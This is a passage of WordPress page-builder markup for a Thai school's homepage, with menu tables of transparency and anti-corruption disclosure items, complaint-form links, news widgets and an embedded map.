d\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} 